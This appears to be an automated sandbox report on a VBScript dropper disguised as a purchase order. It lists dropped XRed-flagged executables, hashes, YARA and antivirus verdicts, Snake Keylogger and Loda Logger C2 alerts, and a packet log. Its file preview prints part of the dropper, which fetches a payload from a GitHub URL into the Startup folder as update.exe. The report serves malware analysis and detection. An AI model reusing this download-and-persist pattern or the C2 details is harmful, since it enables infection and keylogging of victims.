                                                                                                                                                              SHA-512:469E71F255018B611281D7D053E1D8F2B705F8CFEA029F77CFE2F233652B6D81F15A98D22C743BE4A9E4840D059616BDFCF257AAC48A75417F667B3A31F80262
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1652
                                                                                                                                                              Entropy (8bit):5.263061389596769
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:GgsF+051zSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+0z+pAZewRDK4mW
                                                                                                                                                              MD5:EECE0E6B426116577D5448FDBAE0A18A
                                                                                                                                                              SHA1:00C95A499E0E1415A6F137E12F4D455967D78D8A
                                                                                                                                                              SHA-256:A3BF8F60A047B71277729B990C9FA4D4E5EB4B416A4973CC00711E15D22F1ACF
                                                                                                                                                              SHA-512:50754DDAAB348CAAFE5BAF28D1DD88692C1EC996DD8EB6B75CAC1577A17D6622DC12E82E905FEBEA39C6BDC6E472D3D79D253541D3AE02451664B9E4A1A81662
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1652
                                                                                                                                                              Entropy (8bit):5.2710434385884435
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:GgsF+01FnSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+m9+pAZewRDK4mW
                                                                                                                                                              MD5:6641FAE83480CE64A4C6DFD462E9707A
                                                                                                                                                              SHA1:1C77346C9410380F22AA467AF1A699A00EB60874
                                                                                                                                                              SHA-256:91168EE5DC43D2FDA40E72AB71DDC58F5AA7B62CA3BDE9068902074F96BE6B6A
                                                                                                                                                              SHA-512:1FE2340B30383973BBD2DD132A90940A0EE7C68A392193A2CDD061BCAAE3ECF1159CA056A0A0C236D6FD11CF0D7A287FBE843EDBE598E5E347520EF8282C9FDE
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1652
                                                                                                                                                              Entropy (8bit):5.248051232757952
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:GgsF+0fISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+z+pAZewRDK4mW
                                                                                                                                                              MD5:AA69489A506DACB2B77C1556331A01C3
                                                                                                                                                              SHA1:441E5FA672A97626EB3DA1199C47939CB5AFFA75
                                                                                                                                                              SHA-256:6749C6B28F52371F7C9B2118E5676A866586E15684E74F0A6AC6875A0155B766
                                                                                                                                                              SHA-512:407FF12B2DD794A7BED37F65AF2424C1517F36A1C49CEC329A6A0781114E345AF97658CF0C8310431B330301229E2361F75790E5DF1E8D2B6D6E0B836451C2CB
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):165
                                                                                                                                                              Entropy (8bit):1.4377382811115937
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:KVC+cAmltV:KVC+cR
                                                                                                                                                              MD5:9C7132B2A8CABF27097749F4D8447635
                                                                                                                                                              SHA1:71D7F78718A7AFC3EAB22ED395321F6CBE2F9899
                                                                                                                                                              SHA-256:7029AE5479F0CD98D892F570A22B2AE8302747DCFF3465B2DE64D974AE815A83
                                                                                                                                                              SHA-512:333AC8A4987CC7DF5981AE81238A77D123996DB2C4C97053E8BD2048A64FDCF33E1245DEE6839358161F6B5EEA6BFD8D2358BC4A9188D786295C22F79E2D635E
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.user ..j.o.n.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):32768
                                                                                                                                                              Entropy (8bit):3.746897789531007
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                                                                                              MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                                                                                              SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                                                                                              SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                                                                                              SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):916992
                                                                                                                                                              Entropy (8bit):7.852808153468323
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24576:fhloDX0XOf4toB7DIXELQqXqEep4lFycqGkZj:fhloJfxBHUklI7GkB
                                                                                                                                                              MD5:E18974062E92D1E85871E1BE1487F6DC
                                                                                                                                                              SHA1:CEF294ECB4F41DD4970A918550084D30705A1A3B
                                                                                                                                                              SHA-256:F5E48B46D31D16B783F2C91A516562EA9AED19F1D4A6DE820962C6B9A592B2CE
                                                                                                                                                              SHA-512:3B0CF9FC65A9B950EC0B7DD9162F9902B6A2869980C13099DAAB0FA443B39E427B952E74537E527F4DEF4D7E7F2ABD8912C3CEE1DFA57B4FF2FA13EB91A1B007
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 53%
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L...HWjg.........."......P...........0.......@....@.......................................@...@.......@.........................$....@...............................................................2..H...........................................UPX0....................................UPX1.....P.......D..................@....rsrc........@.......H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....
                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe
                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=4, Archive, ctime=Wed Dec 25 07:07:15 2024, mtime=Wed Dec 25 07:07:15 2024, atime=Wed Dec 25 07:07:15 2024, length=916992, window=hide
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1805
                                                                                                                                                              Entropy (8bit):3.404539266834532
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:8JUqLl+0WeFF2uxEAGD6jkrE2+s9T4IlRh4pCBm:8JfLfWNuF+br9MIlR3
                                                                                                                                                              MD5:235FB709C925B25DB5E1D044871E212D
                                                                                                                                                              SHA1:1577CF9F7F27A7FFC38E17BEE022361E2E62A6FF
                                                                                                                                                              SHA-256:C8626B427FC898A643E5D61FC926643CF90F4820AFF00CEF7A3F2DA292D2A762
                                                                                                                                                              SHA-512:02A28BBCCFF00FBD4438DC72571904EBB9F172A43F738EDCEB66CA068F1C8DF2FC6E1C1F2C8111D64B9984713A997D11376CEDD185A03F4B00DB2BF28B69556C
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:L..................F.@.. ...E....V...E...V...E...V............................:..DG..Yr?.D..U..k0.&...&......vk.v....N...V..y....V......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.@...........................%..A.p.p.D.a.t.a...B.V.1......Y.@..Roaming.@......CW.^.Y.@..............................R.o.a.m.i.n.g.....V.1......Y.@..Windata.@......Y.@.Y.@..........................v.`.W.i.n.d.a.t.a.....`.2......Y.@ .NUHORT.exe..F......Y.@.Y.@..........................@L..N.U.H.O.R.T...e.x.e.......`...............-......._...........C.6u.....C:\Users\user\AppData\Roaming\Windata\NUHORT.exe..!.....\.....\.....\.....\.....\.W.i.n.d.a.t.a.\.N.U.H.O.R.T...e.x.e.).".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.i.n.d.a.t.a.\."...C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.s.h.e.l.l.3.2...d.l.l.........%SystemRoot%\SysWOW64\shell32.dll...............................................................................................................
                                                                                                                                                              Process:C:\Windows\System32\wscript.exe
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1688576
                                                                                                                                                              Entropy (8bit):7.451847174682131
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:49152:MnsHyjtk2MYC5GDshloJfxBHUklI7GkBf:Mnsmtk2a5hliBHUklI66f
                                                                                                                                                              MD5:019FC60427D0126ADFEC88980C7FB666
                                                                                                                                                              SHA1:55E2550CE27991E708E30A2E75253093EED0EDB3
                                                                                                                                                              SHA-256:6BF3A9C47D0DC7CBDE76EB4DBD81F9FCAC54F64D7BF907FF952438503D8588B6
                                                                                                                                                              SHA-512:F8013FB625BB6354B50D7C27331C3088904DDD9103E0B28BAC8965EDD83D86353250E97AA872B82756D2765064D5BE30E9E9579E216805C12216634627311A86
                                                                                                                                                              Malicious:true
                                                                                                                                                              Yara Hits:
                                                                                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, Author: Joe Security
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................$....................@.......................... ...................@..............................B*......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................
                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):916992
                                                                                                                                                              Entropy (8bit):7.852808153468323
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24576:fhloDX0XOf4toB7DIXELQqXqEep4lFycqGkZj:fhloJfxBHUklI7GkB
                                                                                                                                                              MD5:E18974062E92D1E85871E1BE1487F6DC
                                                                                                                                                              SHA1:CEF294ECB4F41DD4970A918550084D30705A1A3B
                                                                                                                                                              SHA-256:F5E48B46D31D16B783F2C91A516562EA9AED19F1D4A6DE820962C6B9A592B2CE
                                                                                                                                                              SHA-512:3B0CF9FC65A9B950EC0B7DD9162F9902B6A2869980C13099DAAB0FA443B39E427B952E74537E527F4DEF4D7E7F2ABD8912C3CEE1DFA57B4FF2FA13EB91A1B007
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 53%
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L...HWjg.........."......P...........0.......@....@.......................................@...@.......@.........................$....@...............................................................2..H...........................................UPX0....................................UPX1.....P.......D..................@....rsrc........@.......H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:Microsoft Excel 2007+
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):18387
                                                                                                                                                              Entropy (8bit):7.523057953697544
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                                              MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                                              SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                                              SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                                              SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):165
                                                                                                                                                              Entropy (8bit):1.4377382811115937
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:KVC+cAmltV:KVC+cR
                                                                                                                                                              MD5:9C7132B2A8CABF27097749F4D8447635
                                                                                                                                                              SHA1:71D7F78718A7AFC3EAB22ED395321F6CBE2F9899
                                                                                                                                                              SHA-256:7029AE5479F0CD98D892F570A22B2AE8302747DCFF3465B2DE64D974AE815A83
                                                                                                                                                              SHA-512:333AC8A4987CC7DF5981AE81238A77D123996DB2C4C97053E8BD2048A64FDCF33E1245DEE6839358161F6B5EEA6BFD8D2358BC4A9188D786295C22F79E2D635E
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.user ..j.o.n.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):771584
                                                                                                                                                              Entropy (8bit):6.629891194746731
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9IGr:ansJ39LyjbJkQFMhmC+6GD9Z
                                                                                                                                                              MD5:1D45B99034D67448EBF0776BD5699C84
                                                                                                                                                              SHA1:B0E8641656BE739AF701E0BC197DD3942172EA92
                                                                                                                                                              SHA-256:7D8C783C45AFF23E64E6E801C0F988002078A0E8DA5F85285BB335F997E7E50D
                                                                                                                                                              SHA-512:7E42677B23D34E7EFC0F5DDC6B8E7EB29F3998FF376FF6CC5B5E6D0E4B060F2A8B141C6A510067C901D371BD07EAB9C76E9216A7EE6EED47C1CB592E9E203F10
                                                                                                                                                              Malicious:true
                                                                                                                                                              Yara Hits:
                                                                                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\~$cache1, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\~$cache1, Author: Joe Security
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 100%
                                                                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                                                              File type:assembler source, ASCII text, with CRLF line terminators
                                                                                                                                                              Entropy (8bit):5.529143467566627
                                                                                                                                                              TrID:
                                                                                                                                                                File name:Purchase Order No. G02873362-Docx.vbs
                                                                                                                                                                File size:664 bytes
                                                                                                                                                                MD5:1ab2a527d0e4bd1f76f5467d6e2ea3dc
                                                                                                                                                                SHA1:9731d4f1fc6d6145aa9ed5243cb07b16f17d2f98
                                                                                                                                                                SHA256:115cf5a051098e7bd964d660b0ebead30d851cdbd06886ee2d47007889abae48
                                                                                                                                                                SHA512:2f9a7c422eade46177beff437f617d920b193c13ec4d6c8ea833a79d2523b98151bc02a79ce1bc50d8d4ed68087e3bae545ff028f0366220408a7b196f9d7976
                                                                                                                                                                SSDEEP:12:qLUAoh1Abs1vWdEV7wsnMG1oBHSDREMmfbc+spUmsfLHJ5xS0m4vXiajX9v:YZoMbs1AwnMG1UHSDWDccLvxSN4fvX9v
                                                                                                                                                                TLSH:8F016842CDD0C0DC0A2834F587C21D5AD1E110B873F98F350E90C45F38ED1434C959A7
                                                                                                                                                                File Content Preview:'<<< Coded By Mr.3amo>>> ..Set NcPiYXIs = CreateObject("WScript.Shell")..YpEVzTDI = NcPiYXIs.SpecialFolders("Startup") & "\update.exe"..'<<<<<<<<<<< code start >>>>>>>>>>>..On Error Resume Next..wscript.sleep 3000..call LkCZnKDq("https://raw.githubusercon
                                                                                                                                                                Icon Hash:68d69b8f86ab9a86
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-25T09:06:59.825228+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.4 | 49753 | 172.111.138.100 | 5552 | TCP
2024-12-25T09:07:25.916571+0100 | 2832617 | ETPRO MALWARE W32.Bloat-A Checkin | 1 | 192.168.2.4 | 49745 | 69.42.215.252 | 80 | TCP
2024-12-25T09:07:26.099495+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49740 | 142.250.181.14 | 443 | TCP
2024-12-25T09:07:26.108839+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49741 | 142.250.181.14 | 443 | TCP
2024-12-25T09:07:27.246476+0100 | 2822116 | ETPRO MALWARE Loda Logger CnC Beacon | 1 | 192.168.2.4 | 49753 | 172.111.138.100 | 5552 | TCP
2024-12-25T09:07:27.246476+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.4 | 49753 | 172.111.138.100 | 5552 | TCP
2024-12-25T09:07:29.864974+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49755 | 142.250.181.14 | 443 | TCP
2024-12-25T09:07:29.870681+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49754 | 142.250.181.14 | 443 | TCP
2024-12-25T09:07:33.922381+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49766 | 142.250.181.14 | 443 | TCP
2024-12-25T09:07:33.923467+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49767 | 142.250.181.14 | 443 | TCP
2024-12-25T09:07:36.539383+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49774 | 142.250.181.14 | 443 | TCP
2024-12-25T09:07:36.549457+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49772 | 142.250.181.14 | 443 | TCP
2024-12-25T09:07:39.666676+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49784 | 142.250.181.14 | 443 | TCP
2024-12-25T09:07:39.667770+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49783 | 142.250.181.14 | 443 | TCP
2024-12-25T09:07:42.341155+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49790 | 142.250.181.14 | 443 | TCP
2024-12-25T09:07:42.357691+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49788 | 142.250.181.14 | 443 | TCP
2024-12-25T09:07:45.370596+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49801 | 142.250.181.14 | 443 | TCP
2024-12-25T09:07:45.373896+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49800 | 142.250.181.14 | 443 | TCP
2024-12-25T09:07:49.392235+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49811 | 142.250.181.14 | 443 | TCP
2024-12-25T09:07:49.395030+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49810 | 142.250.181.14 | 443 | TCP
2024-12-25T09:07:53.384741+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49821 | 142.250.181.14 | 443 | TCP
2024-12-25T09:07:53.456342+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49822 | 142.250.181.14 | 443 | TCP
2024-12-25T09:07:57.371609+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49831 | 142.250.181.14 | 443 | TCP
2024-12-25T09:07:57.376489+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49832 | 142.250.181.14 | 443 | TCP
2024-12-25T09:08:01.386686+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49852 | 142.250.181.14 | 443 | TCP
2024-12-25T09:08:01.399802+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49851 | 142.250.181.14 | 443 | TCP
2024-12-25T09:08:05.407778+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49870 | 142.250.181.14 | 443 | TCP
2024-12-25T09:08:05.417943+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49871 | 142.250.181.14 | 443 | TCP
2024-12-25T09:08:08.014451+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49883 | 142.250.181.14 | 443 | TCP
2024-12-25T09:08:08.015887+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49880 | 142.250.181.14 | 443 | TCP
2024-12-25T09:08:11.117118+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49897 | 142.250.181.14 | 443 | TCP
2024-12-25T09:08:11.123125+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49896 | 142.250.181.14 | 443 | TCP
2024-12-25T09:08:13.705640+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49904 | 142.250.181.14 | 443 | TCP
2024-12-25T09:08:13.726696+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49907 | 142.250.181.14 | 443 | TCP
2024-12-25T09:08:14.243532+0100 | 2830912 | ETPRO MALWARE Loda Logger CnC Beacon Response M2 | 1 | 172.111.138.100 | 5552 | 192.168.2.4 | 49753 | TCP
2024-12-25T09:08:16.807097+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49926 | 142.250.181.14 | 443 | TCP
2024-12-25T09:08:16.816355+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49925 | 142.250.181.14 | 443 | TCP
2024-12-25T09:08:20.795906+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49944 | 142.250.181.14 | 443 | TCP
2024-12-25T09:08:20.803683+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49945 | 142.250.181.14 | 443 | TCP
2024-12-25T09:08:23.394098+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49954 | 142.250.181.14 | 443 | TCP
2024-12-25T09:08:23.397849+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49955 | 142.250.181.14 | 443 | TCP
2024-12-25T09:08:26.507057+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49969 | 142.250.181.14 | 443 | TCP
2024-12-25T09:08:26.510332+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49970 | 142.250.181.14 | 443 | TCP
2024-12-25T09:08:29.350572+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49981 | 142.250.181.14 | 443 | TCP
2024-12-25T09:08:29.434120+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49983 | 142.250.181.14 | 443 | TCP
2024-12-25T09:08:32.207709+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 50001 | 142.250.181.14 | 443 | TCP
2024-12-25T09:08:32.221715+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 50002 | 142.250.181.14 | 443 | TCP
2024-12-25T09:08:36.200626+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 50019 | 142.250.181.14 | 443 | TCP
2024-12-25T09:08:36.204733+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 50020 | 142.250.181.14 | 443 | TCP
2024-12-25T09:08:54.743495+0100 | 2830912 | ETPRO MALWARE Loda Logger CnC Beacon Response M2 | 1 | 172.111.138.100 | 5552 | 192.168.2.4 | 49753 | TCP
                                                                                                                                                                Dec 25, 2024 09:07:02.171610117 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:02.171632051 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:02.171665907 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:02.171686888 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:02.197181940 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:02.197230101 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:02.197309971 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:02.197330952 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:02.197359085 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:02.197384119 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:02.226670980 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:02.226716995 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:02.226788044 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:02.226804972 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:02.226833105 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:02.226857901 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:02.340687990 CET44349730185.199.108.133192.168.2.4
